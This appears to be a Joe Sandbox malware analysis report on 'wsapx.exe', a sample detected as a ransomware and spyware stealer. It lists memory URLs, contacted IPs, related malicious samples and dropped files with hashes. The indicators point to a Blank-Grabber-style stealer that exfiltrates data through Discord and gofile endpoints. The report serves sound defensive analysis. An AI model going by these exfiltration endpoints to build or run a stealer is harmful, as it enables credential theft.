https://google.com/mail	wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/specifications/entry-points/	wsapx.exe, 00000002.00000002.2655489440.000001C87A180000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/)	wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/	wsapx.exe, 00000002.00000002.2655982929.000001C87A5A8000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	wsapx.exe, 00000002.00000003.2181812826.000001C879A50000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2181812826.000001C879A40000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/download/releases/2.3/mro/.	wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/251	wsapx.exe, 00000002.00000003.2185307895.000001C87A029000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.bellmedia.c	wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	wsapx.exe, 00000002.00000003.2342123848.000001C879E0E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digicert.co	wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/	wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ifeng.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.zhihu.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServer	wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	wsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.136.232	discord.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574324
Start date and time:	2024-12-13 08:36:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	119
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wsapx.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/56@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 40.126.53.21, 20.223.36.55, 13.107.246.63, 20.12.23.50, 20.103.156.88, 2.16.158.169, 4.175.87.197
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target mshta.exe, PID 7720 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5328 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7664 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: wsapx.exe

Simulations

Behavior and APIs

Time	Type	Description
02:37:20	API Interceptor	4x Sleep call for process: WMIC.exe modified
02:37:22	API Interceptor	127x Sleep call for process: powershell.exe modified
02:37:24	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	ip-api.com/json/?fields=225545
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	ip-api.com/json/
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	ip-api.com/json/
162.159.136.232	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	discord.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	162.159.128.233
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	162.159.128.233
	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	xooSsYaHN0.exe	Get hash	malicious	Go Stealer, Skuld Stealer	Browse	162.159.128.233
	IErMYVWrv9.exe	Get hash	malicious	Python Stealer, Luna Grabber, Luna Logger	Browse	162.159.135.232
ip-api.com	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	208.95.112.1
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	main.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	104.17.25.14
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.16.185.241
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	ZS8xEqirxa.exe	Get hash	malicious	LummaC	Browse	104.21.27.188
	wV1Mk5PUmi.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
TUT-ASUS	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	bigfa.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	e8YDxjwJiT.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	TlNDyT2f5c.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	208.95.112.1
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dll	lz4wnSavmK.exe	Get hash	malicious	Python Stealer	Browse
	WVuXCNNYG0.exe	Get hash	malicious	Python Stealer	Browse
	dipwo1iToJ.exe	Get hash	malicious	Python Stealer	Browse
	Counseling_Services_Overview.docm	Get hash	malicious	Unknown	Browse
	uOsIQqfgiT.exe	Get hash	malicious	Charity, TrojanRansom	Browse
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse
	OBS-Studio-30.2.3-Windows-Installer.exe	Get hash	malicious	Unknown	Browse
	BrowserUpdate.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	CStealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263306995675713
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0L:9JZj5MiKNnNhoxuC
MD5:	C2CCF6F9A5FE1742F6C6B5B88304440C
SHA1:	1C9241471606F83AAA8FB922893CF5976100C991
SHA-256:	6C429D8C71ED34AD698E164AB66E68DE253CAE1900C8BADFF941CAB79D2DE5C4
SHA-512:	A487348E7362BBC994D6F4BB65027937ED4B02BC1BEAFD8367810E74ECD81A22A215DF59AEC0D6CFF3819BACC1B9C31A94CEA5ADE4A429C218662F9A072CEA75
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x4f6ccd56, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555312722617732
Encrypted:	false
SSDEEP:	1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
MD5:	CB17CBA73DDE99BD1BC645884247AABA
SHA1:	60B3CE164820290F9A843A484C27290501F912A9
SHA-256:	F4F35C534AC6EF26F374E4DB846CD5D383496B29FD574D402C7D9B9672C5FCC2
SHA-512:	18C1104D576AE06A0A2A8BD32CE22ADF77319582363FB65AD433C82FEAFD93427E0DD615D34B76D4982BE687B6C6F75CCD2ACE93DB1C4EAE394877B60C21E77A
Malicious:	false
Preview:	Ol.V... .......7.......X\...;...{......................0.e......!...{?..%...\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................m\.%...\|...................d..%...\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07798685728132654
Encrypted:	false
SSDEEP:	3:FllllEYeL53Ejg3NaAPaU1lQiZllllAlluxmO+l/SNxOf:flllEzLpKANDPaUfbl/AgmOH
MD5:	106501F78E8B416AFB170049F1721C7D
SHA1:	9C3105FD908E9FAB81FDBE5FFFACC4BAAEB4EB36
SHA-256:	8A86E2BEBB0378BE0B72A257251E2293548FBFAE5F6E5F946D778212BFF85306
SHA-512:	DA1D57E08D607BB192205D0E727DE951B71C47209F9EA88FBAD1071B40CBBE09F2558E1A1E4225311508D73CD9A44E66AD93BD8216C893D6CD872B39A4EE29FF
Malicious:	false
Preview:	........................................;...{...%...\|...!...{?..........!...{?..!...{?..g...!...{?..................d..%...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ?? ?\Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	695287
Entropy (8bit):	7.926111616696779
Encrypted:	false
SSDEEP:	12288:N5ycy8sD5R//nGMNVgnz6XBEP0Byj5JFchAYwbxr3o8YXVA:N5Ry84/xV1Wiy/FFVxLwG
MD5:	CB5C9DDEDBF0C0A1635AD4622D615573
SHA1:	51B6D11D2BA05D93681E8F24AAB00AFBCC183A0D
SHA-256:	3C3877E7DF6EA3E08D52D1A6843E15C7C70D048B7B78F80A4DEB288821B4E9FC
SHA-512:	918FDB01991ADB8BE255C218656CD99E545EB342D3C25CC6B076987CE5C306BC3B819C6E28F12E12274099D6867BEBDAD8F7A5B65F3B9F856D0BFF40678BF02D
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.eG......K=k.....nf...=s.7mf..W.MO7....".....!.pB....d.........B.;...A.$@....{.v.N.{\...d....x....,A....9..j.<.g...NN.h..^'?7..I.C..t....G.sB....O...:d....k.....q.t.}..\|...}.&.......F.../.t?............Q.t.L..`...=...L.V...m.c..s.##1.......-Ss......'.._>..D.~.....~.9...-.>z_5..{g...=....H.G.{p.s.,...-S..5>..sVt.\...z.....YT0...'.O,..zw...w..e.;...].R;.......1So.qf.[k..r[......L...b.......5.>^dL...i.xs.7.2..w..n.:o..Z..[..n...7..z...%.}..(.q...'..Gw.......__-..).(.f*./.f..).X...W.c.C.u.e4....6...7WK.K{.{m..u.d...\|n.~....}..........w..^.VS{^Su.....~U.._..to).. .v.>.W.S...!..h.....]..s...}..].[.M......_]-.#...x.nin.+3.].hc....Z.W.7.=.v..i.ni....;]..E..........U..........N..%._.Y.[.n....c~Y..K.._....X..;..wL{....c`...R\|.4.P.j.K2.v.4..I{.a...e.<bS.}.K....jj.Kr....~..[_....}X.}.....XK.l..f.4.mZ.Z..o...Z.u.n..S. .<0.\|........lv~........S.....

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1097528243017067
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrN7Khk9+MlWlLehW51IC07Kg:QOaqdmOFdjrcm+kWResLIEg
MD5:	EF9F33D6369B24910FEA1DED407918B5
